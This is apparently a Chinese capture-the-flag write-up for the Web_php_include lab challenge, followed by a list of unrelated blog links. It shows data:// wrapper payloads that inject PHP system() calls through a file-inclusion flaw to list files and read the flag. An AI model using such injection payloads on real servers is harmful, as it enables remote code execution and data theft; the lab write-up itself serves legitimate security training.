攻防世界-WEB-Web_php_include

打开靶机

通过代码审计可以知道,存在文件包含漏洞,并且对伪协议php://进行了过滤。

发现根目录下存在phpinfo

观察phpinfo发现如下:

这两个都为on

所以我们就可以使用data://伪协议

payload如下:

html 复制代码
- ?page=data://text/plain,<?phpsystem("ls")?>- ?page=data://text/plain;base64,PD9waHAgc3lzdGVtKCJscyIpPz4=    #base64编码

访问新连接

上面的payload就可以实现命令执行了

找了半天发现flag在fl4gisisish3r3.php文件中

使用如下payload就可以获取flag了

html 复制代码
?page=data://text/plain,<?phpsystem("cat fl4gisisish3r3.php")?>

使用该命令获取的flag被隐藏了,直接在web界面找不到,可以通过查看网页源代码查看

拿到flag

相关推荐
一只乔哇噻23 分钟前
java后端工程师进修ing(研一版 || day41)
java·开发语言·学习·算法
钮钴禄·爱因斯晨32 分钟前
深入剖析LLM:从原理到应用与挑战
开发语言·人工智能
六点半8881 小时前
【C++】C++11 篇二
开发语言·c++
DDDDDDDRDDR1 小时前
C++容器:list
开发语言·c++·stl
Elnaij1 小时前
从C++开始的编程生活(7)——取地址运算符重载、类型转换、static成员和友元
开发语言·c++
chen_ever1 小时前
golang之go modules
开发语言·后端·golang
郝学胜-神的一滴1 小时前
Effective Modern C++ 条款26:避免在通用引用上重载
开发语言·c++·程序人生
草莓熊Lotso1 小时前
【C++】递归与迭代:两种编程范式的对比与实践
c语言·开发语言·c++·经验分享·笔记·其他
Aczone282 小时前
硬件(六)arm指令
开发语言·汇编·arm开发·嵌入式硬件·算法
YA3333 小时前
java设计模式二、工厂
java·开发语言·设计模式